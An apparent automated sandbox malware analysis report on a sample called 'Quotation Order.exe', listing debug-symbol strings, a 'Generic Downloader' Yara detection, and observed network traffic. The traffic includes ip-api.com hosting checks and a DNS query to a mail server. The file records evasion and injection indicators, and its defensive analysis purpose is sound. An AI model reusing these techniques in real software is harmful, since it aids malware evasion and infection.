                    Source: Binary string: System.Drawing.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: AddInProcess32.pdbpw source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.pdb source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: mscorlib.pdb` source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini\??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: fic.pdbn source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb` source: WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbCon source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdbH source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb#( source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbmeerCo source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb@ source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdbpHj! source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: System.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: mscorlib.pdb" source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: AddInProcess32.pdb source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: mscorlib.pdb source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp, WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Object InvokeMethod(System.Object, System.Object[], System.Signature, Boolean)\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Drawing.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: caspol.pdb source: avdfUcC.exe.31.dr
                    Source: Binary string: System.Core.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbxko source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 192.254.225.166 192.254.225.166
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: mail.bonnyriggdentalsurgery.com.au
                    Source: svchost.exe, 00000024.00000003.1426512052.000002B805E10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1380858399.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                    Source: svchost.exe, 00000024.00000003.1390016964.000002B804EE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                    Source: svchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519109221.000002B805CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpose
                    Source: svchost.exe, 00000024.00000002.2518170013.000002B805C13000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.36.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                    Source: svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425819438.000002B804E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01
                    Source: svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd(
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesA
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesEncr
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdonMe
                    Source: svchost.exe, 00000024.00000003.1425060202.000002B805783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-sod
                    Source: svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0nw
                    Source: svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                    Source: svchost.exe, 00000024.00000003.1389377028.000002B805735000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1399093323.000002B805735000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1389451722.000002B805735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpServ
                    Source: svchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                    Source: svchost.exe, 00000024.00000002.2519461243.000002B805CF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426345130.000002B805C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518233779.000002B805C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519335064.000002B805CD4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1402825732.000002B80570F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bonnyriggdentalsurgery.com.au
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                    Source: AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0T
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                    Source: svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scon
                    Source: svchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scrf
                    Source: svchost.exe, 00000024.00000003.1434799034.000002B805766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scs-cbc
                    Source: svchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scyc=
                    Source: svchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518883672.000002B805C9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: svchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1380858399.000002B805729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1390230532.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: svchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: svchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1
                    Source: svchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustnce
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.000002598039A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: svchost.exe, 00000008.00000002.2513040274.0000029957118000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2511975756.0000029956887000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.8.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
                    Source: Amcache.hve.35.drString found in binary or memory: http://upx.sf.net
                    Source: svchost.exe, 00000003.00000002.1365924349.00000215E6C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co4
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
